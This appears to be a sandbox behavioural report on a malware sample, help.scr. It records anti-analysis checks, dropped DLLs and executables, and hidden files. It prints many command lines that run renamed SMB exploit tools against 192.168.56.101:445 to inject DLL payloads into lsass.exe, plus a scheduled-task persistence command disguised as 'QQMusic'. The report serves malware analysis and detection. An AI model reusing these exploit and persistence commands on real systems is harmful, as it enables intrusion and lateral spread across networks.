WriteConsoleA June 14, 2024, 6:37 p.m.	buffer: [*] Running Exploit console_handle: 0x00000007	1	1
WriteConsoleA June 14, 2024, 6:37 p.m.	buffer: [*] Initializing Parameters console_handle: 0x00000007	1	1
WriteConsoleA June 14, 2024, 6:37 p.m.	buffer: [+] Target 192.168.56.101:445 console_handle: 0x00000007	1	1
WriteConsoleA June 14, 2024, 6:37 p.m.	buffer: [+] Authcode: 0xdab95301 console_handle: 0x00000007	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx June 14, 2024, 6:36 p.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (2 events)

section	.gfids
section	.giats

The file contains an unknown PE resource name possibly indicative of a packer (4 events)

resource name	LNK
resource name	SMB
resource name	X64
resource name	X86

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

Allocates read-write-execute memory (usually to unpack itself) (3 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory June 14, 2024, 6:36 p.m.	process_identifier: 2928 region_size: 81920 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000380000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 14, 2024, 6:36 p.m.	process_identifier: 2928 region_size: 131072 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002670000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 14, 2024, 6:36 p.m.	process_identifier: 2928 region_size: 131072 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000027a0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	1

Checks whether any human activity is being performed by constantly checking whether the foreground window changed

A process attempted to delay the analysis task. (1 event)

description

help.scr tried to sleep 355 seconds, actually delayed analysis time by 355 seconds

Queries the disk size which could be used to detect virtual machine with small fixed size or dynamic allocation (1 event)

Time & API	Arguments	Status	Return	Repeated
GetDiskFreeSpaceExW June 14, 2024, 6:36 p.m.	total_number_of_free_bytes: 9935097856 free_bytes_available: 9935097856 root_path: C:\ total_number_of_bytes: 34252779520	1	1	0

Foreign language identified in PE resource (4 events)

name

LNK

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x00874428

size

0x0005d332

name

SMB

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x00563fa0

size

0x00310484

name

X64

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x003971a0

size

0x0014c800

name

X86

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x004e39a0

size

0x00080600

Creates executable files on the filesystem (50 out of 53 events)

file	C:\ProgramData\pcrecpp-0.dll
file	C:\ProgramData\libiconv-2.dll
file	C:\ProgramData\posh.dll
file	C:\ProgramData\trch-0.dll
file	C:\ProgramData\pcre-0.dll
file	C:\ProgramData\trfo-2.dll
file	C:\ProgramData\riar-2.dll
file	C:\ProgramData\pcreposix-0.dll
file	C:\ProgramData\coli-0.dll
file	C:\ProgramData\tibe-2.dll
file	C:\ProgramData\libxml2.dll
file	C:\ProgramData\tibe-1.dll
file	C:\ProgramData\xdvl-0.dll
file	C:\ProgramData\adfw.dll
file	C:\ProgramData\cnli-0.dll
file	C:\ProgramData\esco-0.dll
file	C:\ProgramData\svchostlong.exe
file	C:\ProgramData\crli-0.dll
file	C:\ProgramData\dmgd-1.dll
file	C:\ProgramData\cnli-1.dll
file	C:\ProgramData\iconv.dll
file	C:\ProgramData\SMB.exe
file	C:\ProgramData\tucl-1.dll
file	C:\ProgramData\svchostromance.exe
file	C:\ProgramData\exma-1.dll
file	C:\ProgramData\etchCore-0.x64.dll
file	C:\ProgramData\etch-0.dll
file	C:\ProgramData\etchCore-0.x86.dll
file	C:\ProgramData\tibe.dll
file	C:\ProgramData\posh-0.dll
file	C:\ProgramData\etebCore-2.x86.dll
file	C:\ProgramData\trfo.dll
file	C:\ProgramData\tucl.dll
file	C:\ProgramData\X86.dll
file	C:\ProgramData\adfw-2.dll
file	C:\ProgramData\libcurl.dll
file	C:\ProgramData\exma.dll
file	C:\ProgramData\zibe.dll
file	C:\ProgramData\trfo-0.dll
file	C:\ProgramData\riar.dll
file	C:\ProgramData\zlib1.dll
file	C:\ProgramData\spreadTpqrst.exe
file	C:\ProgramData\serverlong.exe
file	C:\ProgramData\ssleay32.dll
file	C:\ProgramData\pcla-0.dll
file	C:\ProgramData\eteb-2.dll
file	C:\ProgramData\libeay32.dll
file	C:\ProgramData\dmgd-4.dll
file	C:\ProgramData\etebCore-2.x64.dll
file	C:\ProgramData\X64.dll

Creates hidden or system file (4 events)

Time & API	Arguments	Status	Return
SetFileAttributesW June 14, 2024, 6:36 p.m.	file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: C:\ProgramData filepath: C:\ProgramData	1	1
NtCreateFile June 14, 2024, 6:36 p.m.	create_disposition: 5 (FILE_OVERWRITE_IF) file_handle: 0x000001f0 filepath: C:\ProgramData\spreadTpqrst.exe desired_access: 0x40100080 (FILE_READ_ATTRIBUTES\|SYNCHRONIZE\|GENERIC_WRITE) file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: \??\C:\ProgramData\spreadTpqrst.exe create_options: 96 (FILE_NON_DIRECTORY_FILE\|FILE_SYNCHRONOUS_IO_NONALERT) status_info: 2 (FILE_CREATED) share_access: 1 (FILE_SHARE_READ)	1	0
SetFileAttributesW June 14, 2024, 6:36 p.m.	file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: C:\ProgramData\ filepath: C:\ProgramData\	1	1
NtCreateFile June 14, 2024, 6:36 p.m.	create_disposition: 5 (FILE_OVERWRITE_IF) file_handle: 0x00000290 filepath: C:\ProgramData\SMB.exe desired_access: 0x40100080 (FILE_READ_ATTRIBUTES\|SYNCHRONIZE\|GENERIC_WRITE) file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: \??\C:\ProgramData\SMB.exe create_options: 96 (FILE_NON_DIRECTORY_FILE\|FILE_SYNCHRONOUS_IO_NONALERT) status_info: 2 (FILE_CREATED) share_access: 1 (FILE_SHARE_READ)	1	0

Creates a suspicious process (42 events)

cmdline	svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target SERVER_2008_SP2 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
cmdline	svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target WIN7_SP1 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
cmdline	svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target XP_SP2_X64 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
cmdline	svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target SERVER_2003_SP2 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
cmdline	cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target XP_SP0SP1_X86 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
cmdline	svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target XP_SP2SP3_X86 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
cmdline	cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target WIN7_SP0 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
cmdline	cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target XP_SP2_X64 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
cmdline	svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target VISTA_SP2 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
cmdline	svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target SERVER_2008R2_SP0 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
cmdline	svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target XP_SP1_X64 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
cmdline	cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target WIN7_SP1 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
cmdline	cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target SERVER_2003_SP1 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
cmdline	svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target SERVER_2003_SP0 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
cmdline	cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target SERVER_2003_SP0 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
cmdline	cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target XP_SP2SP3_X86 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
cmdline	svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target XP_SP0SP1_X86 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
cmdline	cmd /c cd C:\ProgramData\&&svchostlong.exe --TargetIp 192.168.56.101 --Target XP --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig 192.168.56.101.txt&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
cmdline	cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target VISTA_SP2 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
cmdline	cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target XP_SP1_X64 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
cmdline	svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target SERVER_2008_SP0 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
cmdline	svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target VISTA_SP1 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
cmdline	svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target VISTA_SP0 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
cmdline	cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target SERVER_2008R2_SP0 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
cmdline	svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target WIN8_SP0 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
cmdline	svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target SERVER_2003_SP1 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
cmdline	cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target SERVER_2008_SP1 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
cmdline	svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target SERVER_2008R2_SP1 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
cmdline	cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target SERVER_2008_SP2 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
cmdline	svchostlong.exe --TargetIp 192.168.56.101 --Target WIN72K8R2 --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig 192.168.56.101.txt
cmdline	cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target SERVER_2008R2_SP1 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
cmdline	cmd /c cd C:\ProgramData\&&svchostlong.exe --TargetIp 192.168.56.101 --Target WIN72K8R2 --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig 192.168.56.101.txt&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
cmdline	cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target SERVER_2008_SP0 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
cmdline	schtasks /create /sc minute /mo 1 /tn "QQMusic" /tr C:\Users\test22\AppData\Local\Temp\help.scr /F
cmdline	cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target VISTA_SP0 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
cmdline	cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target WIN8_SP0 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
cmdline	svchostlong.exe --TargetIp 192.168.56.101 --Target XP --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig 192.168.56.101.txt
cmdline	svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target WIN7_SP0 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
cmdline	cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target VISTA_SP1 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
cmdline	svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target SERVER_2008_SP1 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
cmdline	cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target SERVER_2003_SP2 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
cmdline	cmd /c schtasks /create /sc minute /mo 1 /tn "QQMusic" /tr C:\Users\test22\AppData\Local\Temp\help.scr /F

Drops a binary and executes it (2 events)

file	C:\ProgramData\svchostromance.exe
file	C:\ProgramData\svchostlong.exe

Executes one or more WMI queries (1 event)

wmi	SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "spreadTpqrst.exe")

Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (50 out of 139 events)

Time & API	Arguments	Status	Return
Process32NextW June 14, 2024, 6:36 p.m.	snapshot_handle: 0x0000019c process_name: pw.exe process_identifier: 1688	1	1
Process32NextW June 14, 2024, 6:36 p.m.	snapshot_handle: 0x0000019c process_name: SearchProtocolHost.exe process_identifier: 1256	1	1
Process32NextW June 14, 2024, 6:36 p.m.	snapshot_handle: 0x0000019c process_name: SearchFilterHost.exe process_identifier: 1804	1	1
Process32NextW June 14, 2024, 6:36 p.m.	snapshot_handle: 0x0000019c process_name: help.scr process_identifier: 1532	1	1
Process32NextW June 14, 2024, 6:36 p.m.	snapshot_handle: 0x0000019c process_name: svchost.exe process_identifier: 2208	1	1
Process32NextW June 14, 2024, 6:36 p.m.	snapshot_handle: 0x0000024c process_name: cmd.exe process_identifier: 2860	1	1
Process32NextW June 14, 2024, 6:36 p.m.	snapshot_handle: 0x00000260 process_name: conhost.exe process_identifier: 2964	1	1
Process32NextW June 14, 2024, 6:36 p.m.	snapshot_handle: 0x00000264 process_name: taskhost.exe process_identifier: 2068	1	1
Process32NextW June 14, 2024, 6:36 p.m.	snapshot_handle: 0x0000028c process_name: cmd.exe process_identifier: 2088	1	1
Process32NextW June 14, 2024, 6:36 p.m.	snapshot_handle: 0x00000294 process_name: conhost.exe process_identifier: 948	1	1
Process32NextW June 14, 2024, 6:36 p.m.	snapshot_handle: 0x00000294 process_name: pw.exe process_identifier: 2176	1	1
Process32NextW June 14, 2024, 6:36 p.m.	snapshot_handle: 0x00000294 process_name: pw.exe process_identifier: 6619182		0
Process32NextW June 14, 2024, 6:36 p.m.	snapshot_handle: 0x00000298 process_name: inject-x86.exe process_identifier: 6619242		0
Process32NextW June 14, 2024, 6:36 p.m.	snapshot_handle: 0x00001260 process_name: cmd.exe process_identifier: 3352	1	1
Process32NextW June 14, 2024, 6:36 p.m.	snapshot_handle: 0x00001280 process_name: conhost.exe process_identifier: 3364	1	1
Process32NextW June 14, 2024, 6:36 p.m.	snapshot_handle: 0x000012ac process_name: pw.exe process_identifier: 3400	1	1
Process32NextW June 14, 2024, 6:36 p.m.	snapshot_handle: 0x000012b0 process_name: cmd.exe process_identifier: 3428	1	1
Process32NextW June 14, 2024, 6:36 p.m.	snapshot_handle: 0x000012b0 process_name: is32bit.exe process_identifier: 3436	1	1
Process32NextW June 14, 2024, 6:36 p.m.	snapshot_handle: 0x000012b0 process_name: inject-x86.exe process_identifier: 3452	1	1
Process32NextW June 14, 2024, 6:36 p.m.	snapshot_handle: 0x000012b4 process_name: cmd.exe process_identifier: 3464	1	1
